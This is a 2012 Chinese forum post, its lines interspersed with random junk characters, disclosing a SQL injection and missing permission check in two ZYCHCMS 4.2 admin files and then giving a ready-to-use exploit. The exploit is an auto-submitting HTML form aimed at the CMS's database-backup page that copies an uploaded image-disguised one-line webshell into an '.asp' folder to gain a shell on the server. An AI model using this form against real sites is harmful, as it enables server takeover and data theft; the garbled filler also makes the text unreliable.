& {6 C* C& e! f0 R) q2 g
6 D" T* t6 |- A: s. B6 s- `
3 e) S. v; q \; I9 U* \2 c5 M' G5 ?3 D
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)2 K) i9 {6 i! f% H3 V5 ~+ \
①SQL注射漏洞7 M+ n) W( B7 |. {
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp9 h0 E* Y% t! x5 G. p
漏洞原因:未过滤
5 i2 |( u2 S* a 漏洞代码:
0 ^6 ~& J2 U6 R" V# F 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。0 C2 V" H0 Q( J# g, j/ Z
修复方法:在文件开头加入代码- K3 y! V5 P# i# u) l
; H! L7 i. k) J' E& j
5 g) `5 ~% S3 G) _0 R8 P②后台拿WBSHELL, s e& h) r. q2 b
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
+ x* a' i' m. C8 w( i E! a: O 这里在网上找了一个,改了下,将就着用。
6 z1 D; D3 e1 ~& } 以下是代码本地提交代码
2 B1 \4 \2 e" A0 j ) Q3 l7 Y/ y$ `" ~3 G0 W' I( ^' d
) c' Z% o; X4 _$ n2 F: }( P' a<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>! `, ?# `0 S8 M: ^1 W/ k4 ]) g
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
- H! j0 x/ Y* u9 p; l* M. [# ? <tr># A* F! Y3 S: N$ O2 z6 r! X0 ]
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
; s. R: k: h7 a- i* R </tr>% Z' c, t' {, K8 E8 I
<tr>
7 W; P. Z$ ]+ p7 Y% F1 g, N <td bgcolor=”#FFFFFF”><span class=”back_southidc”>6 [# }, P2 L. W K" ^2 C3 G( Q$ n
</span>
( X0 S* L2 |% r8 y! P1 @# ]5 M4 d <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
3 J& I" v1 S# I3 y6 D <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
) Y5 S! `. f, A' L1 q! I; H9 A) ^7 T% z <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
( Q; T }' r9 Z4 T4 J3 A, N <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d% T+ ] W9 c) O9 c3 ]
<div align=”left”>2 r, K! u c) T8 H
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
( X8 o% r. B: T# { <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>& r& ^0 E# {/ A) V' t* F- k$ A
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />0 f. N. R4 S2 W
</div></td>
" ^7 K& e3 F9 ] </tr>
( b! D) R: H2 T( \. y <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>& u5 _1 I; z8 p0 N. ]% ?; P
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
) ^! Y0 s: k$ g4 S <td class=”td”><div align=”left”>
1 V% M* t+ Z8 v0 Q- ? <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />( `4 G/ d o2 e1 x4 G; _0 J- T
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>0 Z# E) w$ i1 o5 G( t
</tr>
' d* l A# }, |6 a7 J <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>& A, q( F/ ?/ W$ a7 G! {$ ]6 H! P
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
8 v9 {4 j" y/ z <td class=”td”><div align=”left”>( b9 c+ t6 V! ]9 t. D% H
<input type=”submit” value=”确定备份” class=”btn”0 _8 H& N; a7 ]# S7 P+ c+ H3 t
</div></td>
7 e. e& k7 `0 m$ [4 Q& a2 N </tr>
. E: d2 d* r( _- J$ E( e </table></td></tr></form>4 Y2 x9 R" A) L# a/ t& U
</table>
* E! J9 }' e9 \. @: X. a8 N </td>/ R# U/ j$ K. p' {& m- E
</tr>
3 [' E' [3 D( P; Z4 j' c% [2 ? </table>8 b! } y9 d2 {/ h5 k6 g, _
<script>
+ r( w5 g3 [9 j; {4 x document.all.add.submit();0 V5 E- \3 E# X6 k: r; z& o
</script>
% ^+ X' A6 @! D9 E0 X% y
1 G( o' c9 ~0 J0 U7 e& m
* I. ~; R& c* }3 K
0 Z3 l J9 ?2 t! p0 F: Y8 y
7 g! j4 R! l6 `* z8 s0 C0 o. h- M/ g0 p
% ]6 B8 Y+ b) S/ P$ p
4 j" E. R" K- f& t. k
9 Q% r' v+ {( e+ G/ ~& [5 b4 Z, y1 c& n( g+ {
; d) r$ n8 A3 J/ e/ I! F& @ e# B/ S
|
发表于 2012-9-10 21:09:51
收藏
分享
支持
反对